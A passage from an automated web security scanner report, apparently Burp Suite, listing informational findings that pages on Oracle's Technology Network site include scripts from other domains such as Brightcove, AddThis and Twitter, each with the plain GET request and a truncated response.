http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/architect/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41155972631552464,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.188. http://www.oracle.com/technetwork/articles/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/articles/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/articles/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35925501328067259,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.189. http://www.oracle.com/technetwork/community/developer-vm/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/community/developer-vm/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/community/developer-vm/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41112056590278304,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134004

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.190. http://www.oracle.com/technetwork/community/join/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/community/join/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/community/join/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41074239403910534,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.191. http://www.oracle.com/technetwork/community/oracle-ace/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/community/oracle-ace/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://widgets.twimg.com/j/2/widget.js
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/community/oracle-ace/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35656713684448957,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132855

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</h3>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.192. http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/berkeleydb/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/database/berkeleydb/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35925342414274979,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.193. http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/enterprise-edition/documentation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/database/enterprise-edition/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=273;ecid=35983324473649698,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.194. http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/enterprise-edition/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/database/enterprise-edition/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=235;ecid=41084439950149140,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 179935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.195. http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/enterprise-edition/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/database/enterprise-edition/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=172;ecid=41037921159891880,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.196. http://www.oracle.com/technetwork/database/express-edition/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/express-edition/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/database/express-edition/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35640160880236192,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.197. http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/features/instant-client/index-097480.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/database/features/instant-client/index-097480.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35983345948486604,0:1)
Date: Tue, 06 Sep 2011 16:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129536

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.198. http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/database/windows/downloads/index-101290.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/database/windows/downloads/index-101290.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41156226034626734,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 198382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.199. http://www.oracle.com/technetwork/dbadev/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/dbadev/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/dbadev/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40971220316785020,0:1)
Date: Tue, 06 Sep 2011 16:09:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.200. http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/apex/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/developer-tools/apex/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41118116789228163,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.201. http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/eclipse/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/developer-tools/eclipse/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=271;ecid=41051115299626626,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133089

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.202. http://www.oracle.com/technetwork/developer-tools/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/developer-tools/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=6;ecid=35935177889533234,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.203. http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/jdev/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/developer-tools/jdev/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=270;ecid=41074600181168427,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163042

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.204. http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/developer-tools/sql-developer/downloads/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/developer-tools/sql-developer/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=184;ecid=41076300987227916,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153665

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.205. http://www.oracle.com/technetwork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=106;ecid=35926733983699874,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.206. http://www.oracle.com/technetwork/indexes/documentation/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/indexes/documentation/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_otn.js

Request

GET /technetwork/indexes/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=231;ecid=35678789816681054,0:1)
Date: Tue, 06 Sep 2011 16:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162281

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

